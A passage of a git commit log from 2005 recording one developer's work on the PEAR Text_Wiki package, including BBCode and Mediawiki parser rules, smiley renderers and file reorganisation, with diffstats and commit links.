 Text/Wiki/Render/Xhtml/Titlebar.php     | 41 +++++++++++----
 Text/Wiki/Render/Xhtml/Toc.php          | 71 ++++++++++++++++---------
 Text/Wiki/Render/Xhtml/Tt.php           | 47 ++++++++++++-----
 Text/Wiki/Render/Xhtml/Underline.php    | 41 +++++++++++----
 Text/Wiki/Render/Xhtml/Url.php          | 66 +++++++++++++++--------
 Text/Wiki/Render/Xhtml/Wikilink.php     | 77 +++++++++++++++++----------
 43 files changed, 1470 insertions(+), 523 deletions(-)

http://github.com/horde/horde/commit/afcc98eb84392b74d95fb69834a3bd09aca86ecb

-----------------------------------------------------------------------

commit 001f42788b20adf16c6231453af760e7b63edcfe
Author: bertrand Gugger 
Date:   Sat Jul 30 14:31:20 2005 +0000

    Headers
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 191875 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Tiki/Page.php        | 52 ++++++++++++++++++++++++++----------
 Text/Wiki/Parse/Tiki/Plugin.php      | 29 ++++++++++++++++++++
 Text/Wiki/Parse/Tiki/Specialchar.php | 38 +++++++++++++++++++++-----
 3 files changed, 98 insertions(+), 21 deletions(-)

http://github.com/horde/horde/commit/001f42788b20adf16c6231453af760e7b63edcfe

-----------------------------------------------------------------------

commit 86f6e18441ec1576e57b0227fc8baac9f4092449
Author: bertrand Gugger 
Date:   Fri Aug 5 08:06:56 2005 +0000

    Revamped the nesting in parse to catch orphans start or end tags
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192466 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse.php            | 120 +++++++++++++++-------------------
 Text/Wiki/BBCode/Parse/Blockquote.php |  55 +++++-----------
 Text/Wiki/BBCode/Parse/Colortext.php  |  47 ++++---------
 Text/Wiki/BBCode/Parse/Font.php       |  44 ++++---------
 4 files changed, 91 insertions(+), 175 deletions(-)

http://github.com/horde/horde/commit/86f6e18441ec1576e57b0227fc8baac9f4092449

-----------------------------------------------------------------------

commit 33f974e29b9854bff41abd39d3b0b694a66a2f7a
Author: bertrand Gugger 
Date:   Fri Aug 5 18:09:16 2005 +0000

    Made the parsing recursive
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192521 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse/Blockquote.php | 53 ++++++++++++++++++++---------------
 1 file changed, 31 insertions(+), 22 deletions(-)

http://github.com/horde/horde/commit/33f974e29b9854bff41abd39d3b0b694a66a2f7a

-----------------------------------------------------------------------

commit 1ba469cb5ac071be344d17525deffefed0d1cda7
Author: bertrand Gugger 
Date:   Fri Aug 5 18:41:48 2005 +0000

    ooops , sorry debug trace ...
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192526 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse/Blockquote.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/1ba469cb5ac071be344d17525deffefed0d1cda7

-----------------------------------------------------------------------

commit 192f98533946f9460114425d9558043cbb449bc5
Author: bertrand Gugger 
Date:   Fri Aug 5 19:05:03 2005 +0000

    Fixed comments
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192527 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse/Blockquote.php | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/192f98533946f9460114425d9558043cbb449bc5

-----------------------------------------------------------------------

commit befa7d6df4e85d509e2515bf80493f1f82231b56
Author: bertrand Gugger 
Date:   Fri Aug 5 19:42:59 2005 +0000

    Making the rule recursive
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192528 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse/Font.php | 58 +++++++++++++++++++++++++----------------
 1 file changed, 35 insertions(+), 23 deletions(-)

http://github.com/horde/horde/commit/befa7d6df4e85d509e2515bf80493f1f82231b56

-----------------------------------------------------------------------

commit d636e5f50545d9810a0e0d1405f769ebfc9a3530
Author: bertrand Gugger 
Date:   Fri Aug 5 19:52:18 2005 +0000

    Making rule recursive
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192529 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse/Colortext.php | 56 ++++++++++++++++++++++--------------
 1 file changed, 34 insertions(+), 22 deletions(-)

http://github.com/horde/horde/commit/d636e5f50545d9810a0e0d1405f769ebfc9a3530

-----------------------------------------------------------------------

commit e2d5d7ba86d3d2ff31be52efe9ee7907b00ad5d5
Author: bertrand Gugger 
Date:   Fri Aug 5 19:54:47 2005 +0000

    As rules are now recursive, no more need to extend Parse class
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192530 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse.php | 114 ---------------------------------------------
 1 file changed, 114 deletions(-)
 delete mode 100644 Text/Wiki/BBCode/Parse.php

http://github.com/horde/horde/commit/e2d5d7ba86d3d2ff31be52efe9ee7907b00ad5d5

-----------------------------------------------------------------------

commit d16096c42a9552d2a3fca455ca302a715b4c4d29
Author: bertrand Gugger 
Date:   Sat Aug 6 11:36:45 2005 +0000

    Moving BBCode to standard dirs
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192578 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Font.php | 73 ++++++++++++++++++++++++++++++++++++
 Text/Wiki/Render/Plain/Font.php | 44 ++++++++++++++++++++++
 Text/Wiki/Render/Xhtml/Font.php | 83 +++++++++++++++++++++++++++++++++++++++++
 3 files changed, 200 insertions(+)
 create mode 100644 Text/Wiki/Render/Latex/Font.php
 create mode 100644 Text/Wiki/Render/Plain/Font.php
 create mode 100644 Text/Wiki/Render/Xhtml/Font.php

http://github.com/horde/horde/commit/d16096c42a9552d2a3fca455ca302a715b4c4d29

-----------------------------------------------------------------------

commit dfe0cb25176ea5c724671f348252f97afd2b1e3e
Author: bertrand Gugger 
Date:   Sat Aug 6 11:40:48 2005 +0000

    It's in standard Text/Wiki/Render/Xhtml now
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192579 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Render/Xhtml/Font.php | 83 ----------------------------------
 1 file changed, 83 deletions(-)
 delete mode 100644 Text/Wiki/BBCode/Render/Xhtml/Font.php

http://github.com/horde/horde/commit/dfe0cb25176ea5c724671f348252f97afd2b1e3e

-----------------------------------------------------------------------

commit 98a32fcf344bbf153d14815e2aedff529f71624a
Author: bertrand Gugger 
Date:   Sat Aug 6 11:41:53 2005 +0000

    It's in standard Text/Wiki/Render/PLAIN now
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192580 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Render/Plain/Font.php | 44 ----------------------------------
 1 file changed, 44 deletions(-)
 delete mode 100644 Text/Wiki/BBCode/Render/Plain/Font.php

http://github.com/horde/horde/commit/98a32fcf344bbf153d14815e2aedff529f71624a

-----------------------------------------------------------------------

commit 9dd6161e46c20ec04f82c94b6b5e35a6cf3dbe08
Author: bertrand Gugger 
Date:   Sat Aug 6 11:42:56 2005 +0000

    It's in standard Text/Wiki/Render/Latex now
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192581 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Render/Latex/Font.php | 73 ----------------------------------
 1 file changed, 73 deletions(-)
 delete mode 100644 Text/Wiki/BBCode/Render/Latex/Font.php

http://github.com/horde/horde/commit/9dd6161e46c20ec04f82c94b6b5e35a6cf3dbe08

-----------------------------------------------------------------------

commit 1d578540c3e106e0935b0671cd60d66386509b94
Author: bertrand Gugger 
Date:   Sat Aug 6 11:54:08 2005 +0000

    Moving BBCode parser to standard directories
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192582 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/Blockquote.php |  92 +++++++++++++++++
 Text/Wiki/Parse/BBCode/Bold.php       |  64 ++++++++++++
 Text/Wiki/Parse/BBCode/Code.php       |  64 ++++++++++++
 Text/Wiki/Parse/BBCode/Colortext.php  |  93 +++++++++++++++++
 Text/Wiki/Parse/BBCode/Font.php       |  88 ++++++++++++++++
 Text/Wiki/Parse/BBCode/Italic.php     |  64 ++++++++++++
 Text/Wiki/Parse/BBCode/List.php       | 182 ++++++++++++++++++++++++++++++++++
 Text/Wiki/Parse/BBCode/Underline.php  |  64 ++++++++++++
 8 files changed, 711 insertions(+)
 create mode 100644 Text/Wiki/Parse/BBCode/Blockquote.php
 create mode 100644 Text/Wiki/Parse/BBCode/Bold.php
 create mode 100644 Text/Wiki/Parse/BBCode/Code.php
 create mode 100755 Text/Wiki/Parse/BBCode/Colortext.php
 create mode 100644 Text/Wiki/Parse/BBCode/Font.php
 create mode 100644 Text/Wiki/Parse/BBCode/Italic.php
 create mode 100644 Text/Wiki/Parse/BBCode/List.php
 create mode 100644 Text/Wiki/Parse/BBCode/Underline.php

http://github.com/horde/horde/commit/1d578540c3e106e0935b0671cd60d66386509b94

-----------------------------------------------------------------------

commit e016c93ce6c16bd1338456c98d44f5172bbffe45
Author: bertrand Gugger 
Date:   Sat Aug 6 11:59:31 2005 +0000

    Now in standard Text/Wiki/Parse/BBCode
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192584 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode/Parse/Blockquote.php |  92 -----------------
 Text/Wiki/BBCode/Parse/Bold.php       |  64 ------------
 Text/Wiki/BBCode/Parse/Code.php       |  64 ------------
 Text/Wiki/BBCode/Parse/Colortext.php  |  93 -----------------
 Text/Wiki/BBCode/Parse/Font.php       |  88 ----------------
 Text/Wiki/BBCode/Parse/Italic.php     |  64 ------------
 Text/Wiki/BBCode/Parse/List.php       | 182 ----------------------------------
 Text/Wiki/BBCode/Parse/Underline.php  |  64 ------------
 8 files changed, 711 deletions(-)
 delete mode 100644 Text/Wiki/BBCode/Parse/Blockquote.php
 delete mode 100755 Text/Wiki/BBCode/Parse/Bold.php
 delete mode 100644 Text/Wiki/BBCode/Parse/Code.php
 delete mode 100755 Text/Wiki/BBCode/Parse/Colortext.php
 delete mode 100644 Text/Wiki/BBCode/Parse/Font.php
 delete mode 100755 Text/Wiki/BBCode/Parse/Italic.php
 delete mode 100644 Text/Wiki/BBCode/Parse/List.php
 delete mode 100644 Text/Wiki/BBCode/Parse/Underline.php

http://github.com/horde/horde/commit/e016c93ce6c16bd1338456c98d44f5172bbffe45

-----------------------------------------------------------------------

commit 37b810c020b980de380b68a4bafcf29d0d2522fe
Author: bertrand Gugger 
Date:   Sat Aug 6 13:13:01 2005 +0000

    Let's start a PEAR::Text_Wiki_Pedia
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192593 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Pedia/Emphasis.php | 105 +++++++++++++++++++++++++++++++++++++
 1 file changed, 105 insertions(+)
 create mode 100644 Text/Wiki/Parse/Pedia/Emphasis.php

http://github.com/horde/horde/commit/37b810c020b980de380b68a4bafcf29d0d2522fe

-----------------------------------------------------------------------

commit 970ed2e066c6e5ea998361a00f7054a779fb8426
Author: bertrand Gugger 
Date:   Sat Aug 6 13:33:51 2005 +0000

    Sorry, the wiki is Mediawiki ... not Wikipedia
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192596 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Emphasis.php | 105 +++++++++++++++++++++++++++++++++
 1 file changed, 105 insertions(+)
 create mode 100644 Text/Wiki/Parse/Mediawiki/Emphasis.php

http://github.com/horde/horde/commit/970ed2e066c6e5ea998361a00f7054a779fb8426

-----------------------------------------------------------------------

commit 42bc186db65d80e078e043081d7e047a8f72343c
Author: bertrand Gugger 
Date:   Sat Aug 6 13:37:45 2005 +0000

    Sorry, it's now in Text/Wiki/Parse/Mediawiki/
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192597 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Pedia/Emphasis.php | 105 -------------------------------------
 1 file changed, 105 deletions(-)
 delete mode 100644 Text/Wiki/Parse/Pedia/Emphasis.php

http://github.com/horde/horde/commit/42bc186db65d80e078e043081d7e047a8f72343c

-----------------------------------------------------------------------

commit 9affb004125c9a4c32b1bba839fa725f3d07e9ac
Author: bertrand Gugger 
Date:   Sat Aug 6 18:43:19 2005 +0000

    Base class for Mediawiki parsing
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192618 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php | 108 ++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 108 insertions(+)
 create mode 100644 Text/Wiki/Mediawiki.php

http://github.com/horde/horde/commit/9affb004125c9a4c32b1bba839fa725f3d07e9ac

-----------------------------------------------------------------------

commit d9ae745db3c23cedec972cffc75c0dc74a7ba87f
Author: bertrand Gugger 
Date:   Sat Aug 6 18:45:37 2005 +0000

    Extending the list of parsers and renderers available
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192619 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/test_Text_Wiki.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/d9ae745db3c23cedec972cffc75c0dc74a7ba87f

-----------------------------------------------------------------------

commit f7da336732a2d7a42b22591e95afb4e4e869af4c
Author: bertrand Gugger 
Date:   Sun Aug 7 05:27:24 2005 +0000

    Fixed comments and headers
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192647 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Mediawiki/Emphasis.php | 22 ++--------------------
 1 file changed, 2 insertions(+), 20 deletions(-)

http://github.com/horde/horde/commit/f7da336732a2d7a42b22591e95afb4e4e869af4c

-----------------------------------------------------------------------

commit 8afaca8d961c9b2aea56a52d2ac6b1c7b84dfacc
Author: bertrand Gugger 
Date:   Sun Aug 7 09:05:21 2005 +0000

    Wrong @see in headers
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192655 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/Blockquote.php | 4 ++--
 Text/Wiki/Parse/BBCode/Colortext.php  | 4 ++--
 Text/Wiki/Parse/BBCode/Font.php       | 2 +-
 3 files changed, 5 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/8afaca8d961c9b2aea56a52d2ac6b1c7b84dfacc

-----------------------------------------------------------------------

commit a2a4aab2ab424d1fa0a8aa1e0b9ee1853bcf6f53
Author: bertrand Gugger 
Date:   Mon Aug 8 11:17:43 2005 +0000

    As the parser is now "standard", no need to require Text/Wiki/Parser.php
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192746 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode.php | 7 +------
 1 file changed, 1 insertion(+), 6 deletions(-)

http://github.com/horde/horde/commit/a2a4aab2ab424d1fa0a8aa1e0b9ee1853bcf6f53

-----------------------------------------------------------------------

commit a58f6b1e9cb45a5b6bab9362d408bca47aaadcd6
Author: bertrand Gugger 
Date:   Mon Aug 8 11:36:28 2005 +0000

    Fixed the parse Addpath, removed the render one
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192748 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode.php | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

http://github.com/horde/horde/commit/a58f6b1e9cb45a5b6bab9362d408bca47aaadcd6

-----------------------------------------------------------------------

commit eb5e8fb717855b15a5a1ec8a29b2c2467703837c
Author: bertrand Gugger 
Date:   Mon Aug 8 12:53:18 2005 +0000

    Makes the 2 [url.. syntaxes and inline urls, emails to come
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192753 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/Url.php | 138 +++++++++++++++++++++++++++++++++++++++++
 1 file changed, 138 insertions(+)
 create mode 100644 Text/Wiki/Parse/BBCode/Url.php

http://github.com/horde/horde/commit/eb5e8fb717855b15a5a1ec8a29b2c2467703837c

-----------------------------------------------------------------------

commit 8e7c0adc7c0d3088c3cbf8810f438b57b514a725
Author: bertrand Gugger 
Date:   Mon Aug 8 15:32:18 2005 +0000

    Implemented the config for refused schemes and disable inline urls
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192768 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/Url.php | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/8e7c0adc7c0d3088c3cbf8810f438b57b514a725

-----------------------------------------------------------------------

commit f01d2b9295d11e3988a68380e565649fd1930538
Author: bertrand Gugger 
Date:   Tue Aug 9 07:38:53 2005 +0000

    Integrated [email] markup and inline emails
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192820 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/Url.php | 58 ++++++++++++++++++++++++++++--------------
 1 file changed, 39 insertions(+), 19 deletions(-)

http://github.com/horde/horde/commit/f01d2b9295d11e3988a68380e565649fd1930538

-----------------------------------------------------------------------

commit 7d696cde43980084772940e0005862b111caeef7
Author: bertrand Gugger 
Date:   Tue Aug 9 12:03:32 2005 +0000

    Images with schemes, extensions, urls and local path configs
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192852 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/Image.php | 104 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 104 insertions(+)
 create mode 100644 Text/Wiki/Parse/BBCode/Image.php

http://github.com/horde/horde/commit/7d696cde43980084772940e0005862b111caeef7

-----------------------------------------------------------------------

commit c9716a3c4b0dba5cc00b462d5c793d37b6e13e40
Author: bertrand Gugger 
Date:   Tue Aug 9 16:16:52 2005 +0000

    Some more tests for URIs , mails and images
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192869 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/BBtest.txt | 7 +++++++
 1 file changed, 7 insertions(+)

http://github.com/horde/horde/commit/c9716a3c4b0dba5cc00b462d5c793d37b6e13e40

-----------------------------------------------------------------------

commit 1f97805949c136cf255f75eac4f9b993e08501e2
Author: bertrand Gugger 
Date:   Wed Aug 10 05:36:30 2005 +0000

    Ooops ! forgot some debug output ...
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192908 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/Image.php | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

http://github.com/horde/horde/commit/1f97805949c136cf255f75eac4f9b993e08501e2

-----------------------------------------------------------------------

commit f9743ebc8d14aa51b4dabd9f062e30699535d161
Author: bertrand Gugger 
Date:   Wed Aug 10 08:57:35 2005 +0000

    Fixed comments and wrong cvs Id
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192928 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/Image.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/f9743ebc8d14aa51b4dabd9f062e30699535d161

-----------------------------------------------------------------------

commit 52ea7d5b4f75183880055da54c0f38ebcf8d8099
Author: bertrand Gugger 
Date:   Wed Aug 10 09:05:36 2005 +0000

    :-o The most important was missing in Text_Wiki ! Smile ! :-)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192929 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Smiley.php | 159 +++++++++++++++++++++++++++++++++++++
 1 file changed, 159 insertions(+)
 create mode 100644 Text/Wiki/Parse/Default/Smiley.php

http://github.com/horde/horde/commit/52ea7d5b4f75183880055da54c0f38ebcf8d8099

-----------------------------------------------------------------------

commit d3791eefb8a6c08f67d41631c513434fa8a12c10
Author: bertrand Gugger 
Date:   Wed Aug 10 09:09:39 2005 +0000

    Enabled the Smiley rule
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192930 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode.php | 1 +
 1 file changed, 1 insertion(+)

http://github.com/horde/horde/commit/d3791eefb8a6c08f67d41631c513434fa8a12c10

-----------------------------------------------------------------------

commit cacfad0ff77d0a6bb09bacf8cceda6f7f5a32f41
Author: bertrand Gugger 
Date:   Wed Aug 10 10:09:14 2005 +0000

    Fixed an inversion in left handed smileys, does not catch anymore the boundaries
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192937 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Smiley.php | 32 ++++++++++++++++----------------
 1 file changed, 16 insertions(+), 16 deletions(-)

http://github.com/horde/horde/commit/cacfad0ff77d0a6bb09bacf8cceda6f7f5a32f41

-----------------------------------------------------------------------

commit 3a757bf9332d4fc57753826623a01b6e4e4ff204
Author: bertrand Gugger 
Date:   Wed Aug 10 10:11:23 2005 +0000

    Smiley plain renderer :)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192938 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Plain/Smiley.php | 44 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 44 insertions(+)
 create mode 100644 Text/Wiki/Render/Plain/Smiley.php

http://github.com/horde/horde/commit/3a757bf9332d4fc57753826623a01b6e4e4ff204

-----------------------------------------------------------------------

commit e0199e64c66648a10d3c79b52081d6d1777800ab
Author: bertrand Gugger 
Date:   Wed Aug 10 10:13:28 2005 +0000

    Smiley Latex renderer :)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192939 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Smiley.php | 44 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 44 insertions(+)
 create mode 100644 Text/Wiki/Render/Latex/Smiley.php

http://github.com/horde/horde/commit/e0199e64c66648a10d3c79b52081d6d1777800ab

-----------------------------------------------------------------------

commit 80795ba56b6e5577c999df0398163775297d480a
Author: bertrand Gugger 
Date:   Wed Aug 10 11:38:55 2005 +0000

    Smiley rule Xhtml renderer :)
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192950 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Xhtml/Smiley.php | 74 +++++++++++++++++++++++++++++++++++++++
 1 file changed, 74 insertions(+)
 create mode 100644 Text/Wiki/Render/Xhtml/Smiley.php

http://github.com/horde/horde/commit/80795ba56b6e5577c999df0398163775297d480a

-----------------------------------------------------------------------

commit a12ce3ffc691b158e8f8fd66a962b7fce55d4fe3
Author: bertrand Gugger 
Date:   Wed Aug 10 11:42:08 2005 +0000

    Typo
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192951 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Render/Latex/Smiley.php | 2 +-
 Text/Wiki/Render/Plain/Smiley.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/a12ce3ffc691b158e8f8fd66a962b7fce55d4fe3

-----------------------------------------------------------------------

commit adfce2794fd7657239e1deed14fb84a52b157e2c
Author: bertrand Gugger 
Date:   Wed Aug 10 12:02:58 2005 +0000

    Comment
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 192955 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/Url.php | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/adfce2794fd7657239e1deed14fb84a52b157e2c

-----------------------------------------------------------------------

commit 3baf115080d914fcb87bff7683cd94405e765b86
Author: bertrand Gugger 
Date:   Thu Aug 11 03:46:18 2005 +0000

    Removed the Specialchar rule as Smiley is now in
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193017 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/BBCode.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/3baf115080d914fcb87bff7683cd94405e765b86

-----------------------------------------------------------------------

commit 515784c7bc1d2f1e051ecd9bef5ab3d73011366d
Author: bertrand Gugger 
Date:   Thu Aug 11 09:57:28 2005 +0000

    Option with _ instead of -, misplaced docbook tags
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193037 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Smiley.php | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

http://github.com/horde/horde/commit/515784c7bc1d2f1e051ecd9bef5ab3d73011366d

-----------------------------------------------------------------------

commit 9ffbc87d7fb46bcd04e53438de5e2dff7202cf64
Author: bertrand Gugger 
Date:   Thu Aug 11 10:23:50 2005 +0000

    Config keys with _ instead of - , misplaced docbook tags
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193040 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/BBCode/Blockquote.php |  2 +-
 Text/Wiki/Parse/BBCode/Bold.php       | 14 +++++++-------
 Text/Wiki/Parse/BBCode/Code.php       | 14 +++++++-------
 Text/Wiki/Parse/BBCode/Colortext.php  |  2 +-
 Text/Wiki/Parse/BBCode/Font.php       |  2 +-
 Text/Wiki/Parse/BBCode/Image.php      | 16 ++++++++--------
 Text/Wiki/Parse/BBCode/Italic.php     | 13 ++++++-------
 Text/Wiki/Parse/BBCode/List.php       |  4 ++--
 Text/Wiki/Parse/BBCode/Underline.php  | 14 +++++++-------
 Text/Wiki/Parse/BBCode/Url.php        | 30 +++++++++++++++---------------
 10 files changed, 55 insertions(+), 56 deletions(-)

http://github.com/horde/horde/commit/9ffbc87d7fb46bcd04e53438de5e2dff7202cf64

-----------------------------------------------------------------------

commit c5657ec2bcb84b97fb8212139867642fbf6d26e2
Author: bertrand Gugger 
Date:   Thu Aug 11 17:08:12 2005 +0000

    Simplified configuration
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193070 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Smiley.php | 13 ++++++-------
 1 file changed, 6 insertions(+), 7 deletions(-)

http://github.com/horde/horde/commit/c5657ec2bcb84b97fb8212139867642fbf6d26e2

-----------------------------------------------------------------------

commit 08868f028c05e7cf0838d8942154fe59d29652ae
Author: bertrand Gugger 
Date:   Thu Aug 11 18:21:49 2005 +0000

    More simple and user friendly
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193077 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Parse/Default/Smiley.php | 112 ++++++++++++++++++-------------------
 1 file changed, 55 insertions(+), 57 deletions(-)

http://github.com/horde/horde/commit/08868f028c05e7cf0838d8942154fe59d29652ae

-----------------------------------------------------------------------

commit 3ba3415d32a9973687ace54969841e817ceee4c6
Author: bertrand Gugger 
Date:   Fri Aug 12 11:20:35 2005 +0000

    Full compatible with HTML_BBCodeParser, configuration summarized thru in file
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193175 c90b9560-bf6c-de11-be94-00142212c4b1

 doc/BBCodeParser.php    | 427 ++++++++++++++++++++++++++++++++++++++++++++++++
 doc/BBCodeParser_V2.ini | 160 ++++++++++++++++++
 doc/README_BBCodeParser |  45 +++++
 doc/parser.php          | 121 ++++++++++++++
 4 files changed, 753 insertions(+)
 create mode 100644 doc/BBCodeParser.php
 create mode 100644 doc/BBCodeParser_V2.ini
 create mode 100644 doc/README_BBCodeParser
 create mode 100644 doc/parser.php

http://github.com/horde/horde/commit/3ba3415d32a9973687ace54969841e817ceee4c6

-----------------------------------------------------------------------

commit 794278f34d45d494a77c625927434a0844e0e5b9
Author: bertrand Gugger 
Date:   Sun Aug 14 09:17:46 2005 +0000

    Disabled all rules not yet existing,
    they will be enabled as the parsing rules will be produced
    
    
    git-svn-id: https://svn.php.net/repository/pear/packages/Text_Wiki/trunk at 193395 c90b9560-bf6c-de11-be94-00142212c4b1

 Text/Wiki/Mediawiki.php | 71 +++++++++++++++++++++++++------------------------
 1 file changed, 36 insertions(+), 35 deletions(-)

http://github.com/horde/horde/commit/794278f34d45d494a77c625927434a0844e0e5b9

-----------------------------------------------------------------------

commit 7e2dc61febde57fed8b4685a803b2fe62909f80a
